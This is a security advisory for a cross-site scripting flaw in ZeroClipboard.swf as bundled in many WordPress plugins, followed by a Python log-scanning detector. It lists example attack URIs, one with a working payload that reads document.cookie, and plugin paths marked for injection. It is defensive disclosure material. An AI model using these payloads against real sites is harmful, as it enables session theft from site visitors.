ZeroClipboard 'ZeroClipboard10.swf' Cross Site Scripting Vulnerability

Attackers can exploit this issue by enticing an unsuspecting victim to follow a malicious URI.

The following example URIs are available:

http://www.example.com/js/ZeroClipboard.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://www.example.com/wp-content/plugins/bp-code-snippets/js/ZeroClipboard.swf?id=[XSS]
http://www.example.com/wp-content/plugins/buckets/js/ZeroClipboard.swf?id=[XSS]
http://www.example.com/wp-content/plugins/cleeng/js/ZeroClipboard.swf?id=[XSS]
http://www.example.com/wp-content/plugins/click-to-copy-grab-box/lib/ZeroClipboard.swf?id=[XSS]
http://www.example.com/wp-content/plugins/geshi-source-colorer/external/zeroclipboard/ZeroClipboard.swf?id=[XSS]
http://www.example.com/wp-content/plugins/jaspreetchahals-coupons-lite/js/ZeroClipboard.swf?id=[XSS]
http://www.example.com/wp-content/plugins/mobileview/admin/js/ZeroClipboard.swf?id=[XSS]
http://www.example.com/wp-content/plugins/paypal-digital-goods-monetization-powered-by-cleeng/js/ZeroClipboard.swf?id=[xss]
http://www.example.com/wp-content/plugins/slidedeck2/js/zeroclipboard/ZeroClipboard.swf?id=[xss]
http://www.example.com/wp-content/plugins/wp-clone-by-wp-academy/lib/js/ZeroClipboard.swf?id=[xss]
http://www.example.com/wp-content/plugins/thethe-layout-grid/style/ZeroClipboard.swf?id=[xss]
http://www.example.com/wp-content/plugins/zopim-live-chat/ZeroClipboard.swf?id=[xss]
http://www.example.com/wp-content/plugins/wp-link-to-us/js/ZeroClipboard.swf?id=[xss]
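
As an added detection example (not part of the original advisory), the following scans web access log lines for requests to a bundled ZeroClipboard SWF whose `id` parameter is not a plain token. The function name, the combined log format, and the rule that a legitimate `id` is a short alphanumeric value are assumptions; the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# ZeroClipboard.swf / ZeroClipboard10.swf at any depth (plugins bundle their own copy).
SWF_PATH = re.compile(r"/zeroclipboard(?:10)?\.swf$", re.IGNORECASE)
# Assumption: common/combined log format, request logged as "METHOD target HTTP/x.y".
REQUEST = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate embed passes a short alphanumeric client id.
SAFE_ID = re.compile(r"[A-Za-z0-9_-]{1,32}")

def suspicious_swf_requests(log_lines):
    """Return (path, decoded id) for SWF requests whose id is not a plain token."""
    hits = []
    for line in log_lines:
        match = REQUEST.search(line)
        if not match:
            continue  # not a parsable request line
        target = urlsplit(match.group(1))
        if not SWF_PATH.search(target.path):
            continue  # some other resource
        # parse_qsl percent-decodes values, so encoded quotes and braces are visible.
        for key, value in parse_qsl(target.query, keep_blank_values=True):
            if key == "id" and not SAFE_ID.fullmatch(value):
                hits.append((target.path, value))
                break
    return hits

# Constructed sample lines (not real traffic); the id values are inert stand-ins.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Mar/2013:10:00:00 +0000] "GET /js/ZeroClipboard.swf?id=1&width=80&height=20 HTTP/1.1" 200 1071',
    '203.0.113.9 - - [01/Mar/2013:10:00:07 +0000] "GET /wp-content/plugins/buckets/js/ZeroClipboard.swf?id=%5C%22))%7Dcatch(e)%7B%7D//&width&height HTTP/1.1" 200 1071',
    '203.0.113.9 - - [01/Mar/2013:10:00:09 +0000] "GET /search?id=%22quoted%22 HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Mar/2013:10:00:12 +0000] "GET /lib/ZeroClipboard10.swf?id=%5BXSS%5D HTTP/1.1" 200 1071',
]

if __name__ == "__main__":
    for path, value in suspicious_swf_requests(SAMPLE_LOG):
        print(f"{path}\tid={value!r}")
```

A 200 response to a flagged request also shows that the SWF is still deployed at that path, which makes the same output usable as an inventory of bundled copies to remove or update.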


 

Copyright 2010, SecurityFocus